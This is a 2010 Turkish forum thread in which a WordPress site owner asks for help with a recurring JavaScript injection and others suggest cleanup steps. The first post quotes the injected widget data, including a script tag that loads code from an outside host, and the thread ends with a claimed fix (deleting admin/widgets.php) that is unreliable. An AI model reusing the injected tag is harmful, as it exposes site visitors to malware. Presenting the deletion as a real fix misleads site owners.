• 31-01-2010, 17:56:25
    #1
    Selamlar wordpress sitem var ve hergün içine js kodu eklenmekte wp sürümüm 2.9.1 bu nasıl olur hergün silmekten bıktım.

    Alıntı
    a:3:{i:2;a:0:{}i:5;a:3:{s:5:"title";s:0:"";s:4:"te xt";s:75:"<script src="http://www.newoptionrj.com.br/loja/pornolar/hehe.js"></script>";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}
    widget_txt diye wp_options tablosuna yazıyor widget_txt yi silsemde şifreli password istesemde gene yenisini autoloadı yes şeklinde ekleyebiliyor bunu neden yapar eklentilerdenmi yoksa acık falanmı var? bu virüs şuan gündemde olan ****** sitelerin büyük sıkıntısı oldu. Gördüklerimin çoğunda var şifrelerimi değiştirdim wordpressi yeniden atmama rağmen 777 chmod olan hiç bir dosyada olmamasına rağmen kafayı bozdurucak bana yardımcı olabilen varsa veya bilmediğimiz yeni bir açık yardımcı olursa çok makbule geçecek kolay gelsin.
  • 31-01-2010, 18:16:07
    #2
    İframe virusune benziyor kardeşim anlatıgın kadarıyla eger oysa forumda temizleme yontemleri var kolay gelsin
  • 31-01-2010, 19:14:26
    #3
    yok iframe değil bu widget dosyalarındaki açık söz konusu yada server ayarlarına yapılcak bi hamle lazım.
  • 31-01-2010, 19:35:33
    #4
    Dostum aynısından biz de yedik zamanında..Bu kodu yediğin zaman yapman gereken tek şey debelenmemek..Yani dosyayı editlemek vs. ile uğraşmayacan..Yapman gerekenleri tecrübelerime dayanarak söylüyorum..
    -Eset varsa Pc'nde kaldır Avira kur ve Pc'ni acilen tarat..
    -Siteni tamamen whm panelden sil..Wordpressi tekrar kur ve databaseyi, dosyaları (bu kodlardan arındırarak yedekleri geri at)
    -Siteni sildikten sonra yeniden hesap açarken mutlaka ftp kullanıcı adını, şifreni, Db Adını ve şifresini değiş..

    Aksi durumda 2 günde bir googleden fişlenirsin tekrar editlersin ve böyle sürer gider
  • 31-01-2010, 20:41:02
    #5
    Biraz daha açarmısın söz konusu dosya admin panelindeki widgets.php dosyasıdır. bunu tespit ettik ama böle bir açık varsaki var defalarca wpyi sitesinden indirip atsamda olmuyor gene geliyor. Biz virüs yedik vsde bu konu herkesi ilgilendiriyor böyle lameruslar hırsızlara karşı topluca önlem almak lazım hesabı silip tekrar acmamız gerekiyosada onuda yaparız sorun değilde nereye ne şekilde kendini kopyalıyor onu bulmak bütün mesela.
  • 03-02-2010, 22:08:52
    #6
    Sorunu buldum arkadaşlar admin klasorundeki widgets.php yi silmeniz yeterlidir eğerki vidget eklemicekseniz tabi eklenen vidgetlere bi zararı yok denedim mysql e yazamaz hale geldi lamerus arkadaş.

    Dualarınız yeter kolay gelsin.